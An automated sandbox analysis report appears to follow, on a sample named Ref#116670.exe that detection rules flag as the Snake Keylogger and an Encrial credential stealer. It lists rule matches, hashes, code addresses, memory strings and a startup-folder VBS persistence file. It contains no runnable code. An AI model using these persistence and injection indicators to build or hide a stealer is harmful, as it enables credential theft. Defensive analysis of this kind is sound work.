                    Source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB2828 NtResumeThread,0_2_05CB2828
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB02E8 NtProtectVirtualMemory,0_2_05CB02E8
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB2820 NtResumeThread,0_2_05CB2820
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB02E2 NtProtectVirtualMemory,0_2_05CB02E2
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06160BC0 NtResumeThread,5_2_06160BC0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06160BBA NtResumeThread,5_2_06160BBA
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618ECD8 NtProtectVirtualMemory,5_2_0618ECD8
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618ECD0 NtProtectVirtualMemory,5_2_0618ECD0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_0245DAFC0_2_0245DAFC
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB00400_2_05CB0040
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB39480_2_05CB3948
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB39580_2_05CB3958
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB00230_2_05CB0023
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB32C00_2_05CB32C0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CB32D00_2_05CB32D0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CD65D00_2_05CD65D0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CDD1680_2_05CDD168
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CD88900_2_05CD8890
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CD65C00_2_05CD65C0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CDF6930_2_05CDF693
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CDF6A00_2_05CDF6A0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CDD1590_2_05CDD159
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CD59200_2_05CD5920
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CD59300_2_05CD5930
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_05CD88800_2_05CD8880
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06819E180_2_06819E18
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068167950_2_06816795
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068167A00_2_068167A0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068162010_2_06816201
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068162100_2_06816210
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068950200_2_06895020
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06893C300_2_06893C30
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D83B90_2_068D83B9
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D78C80_2_068D78C8
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D78B80_2_068D78B8
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D88B00_2_068D88B0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D00060_2_068D0006
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D00400_2_068D0040
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D71800_2_068D7180
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_068D71900_2_068D7190
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0DE780_2_06A0DE78
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A09FD00_2_06A09FD0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0CDA00_2_06A0CDA0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A04DB80_2_06A04DB8
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0DE680_2_06A0DE68
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A09FBF0_2_06A09FBF
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0E38F0_2_06A0E38F
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0DF2F0_2_06A0DF2F
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0DF080_2_06A0DF08
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0C0880_2_06A0C088
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0C0780_2_06A0C078
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0CD900_2_06A0CD90
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A0F1370_2_06A0F137
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A196100_2_06A19610
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A15C900_2_06A15C90
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A119F90_2_06A119F9
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A16E980_2_06A16E98
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A15FB70_2_06A15FB7
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A129C00_2_06A129C0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A129D00_2_06A129D0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06AC00060_2_06AC0006
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06AC00400_2_06AC0040
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D8EA580_2_06D8EA58
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D8DF980_2_06D8DF98
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D700400_2_06D70040
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D700330_2_06D70033
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06893C110_2_06893C11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0128C1483_2_0128C148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_012827B93_2_012827B9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0128CA903_2_0128CA90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_01284D883_2_01284D88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_01282DD13_2_01282DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_01287E483_2_01287E48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0128B9C03_2_0128B9C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0128CA653_2_0128CA65
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0128CA823_2_0128CA82
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_01284D783_2_01284D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_01287E433_2_01287E43
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0266DAFC5_2_0266DAFC
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_061616585_2_06161658
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_061616685_2_06161668
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06161D105_2_06161D10
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06161D025_2_06161D02
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06186E785_2_06186E78
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618EA305_2_0618EA30
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618B8185_2_0618B818
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06186E695_2_06186E69
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618DD3F5_2_0618DD3F
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618DD505_2_0618DD50
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618EA225_2_0618EA22
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0618B8085_2_0618B808
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06BC9E185_2_06BC9E18
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06BC67A05_2_06BC67A0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06BC67905_2_06BC6790
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06BC62105_2_06BC6210
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06BC62015_2_06BC6201
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06C883B95_2_06C883B9
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06C878C85_2_06C878C8
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06C878B85_2_06C878B8
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06C800405_2_06C80040
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06C800065_2_06C80006
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06C871805_2_06C87180
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06C871905_2_06C87190
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBDE785_2_06DBDE78
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DB9FD05_2_06DB9FD0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DB4DB85_2_06DB4DB8
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBCDA05_2_06DBCDA0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBDE685_2_06DBDE68
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBE3D05_2_06DBE3D0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBE38F5_2_06DBE38F
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DB9FBF5_2_06DB9FBF
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBDF085_2_06DBDF08
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBDF2F5_2_06DBDF2F
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBC0885_2_06DBC088
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBC0785_2_06DBC078
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBCD905_2_06DBCD90
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DBF1375_2_06DBF137
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DC96105_2_06DC9610
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DC5C905_2_06DC5C90
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DC19F95_2_06DC19F9
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DC6E985_2_06DC6E98
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DC5FB75_2_06DC5FB7
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DC29D05_2_06DC29D0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06DC29C05_2_06DC29C0
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06E700405_2_06E70040
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_06E700065_2_06E70006
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0713EA585_2_0713EA58
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_0713DF985_2_0713DF98
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_071200325_2_07120032
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeCode function: 5_2_071200405_2_07120040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BEC1687_2_00BEC168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BECAB07_2_00BECAB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BE2DD17_2_00BE2DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BE7E687_2_00BE7E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BE4F087_2_00BE4F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BEB9E07_2_00BEB9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BECAA37_2_00BECAA3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BE4EF87_2_00BE4EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_00BE7E677_2_00BE7E67
                    Source: Ref#116670.exeStatic PE information: invalid certificate
                    Source: Ref#116670.exe, 00000000.00000002.2249245132.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.00000000026D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2270089173.0000000006700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameVtlyqv.dll" vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000000.2037381017.00000000000E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRef.exe8 vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVtlyqv.dll" vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.000000000288B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs Ref#116670.exe
                    Source: Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#116670.exe
                    Source: Ref#116670.exeBinary or memory string: OriginalFilenameRef.exe8 vs Ref#116670.exe
                    Source: Ref#116670.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Ref#116670.exe, GenericLogger.csCryptographic APIs: 'TransformFinalBlock'
                    Source: vdvfyt.exe.0.dr, GenericLogger.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                    Source: C:\Users\user\Desktop\Ref#116670.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                    Source: Ref#116670.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Ref#116670.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
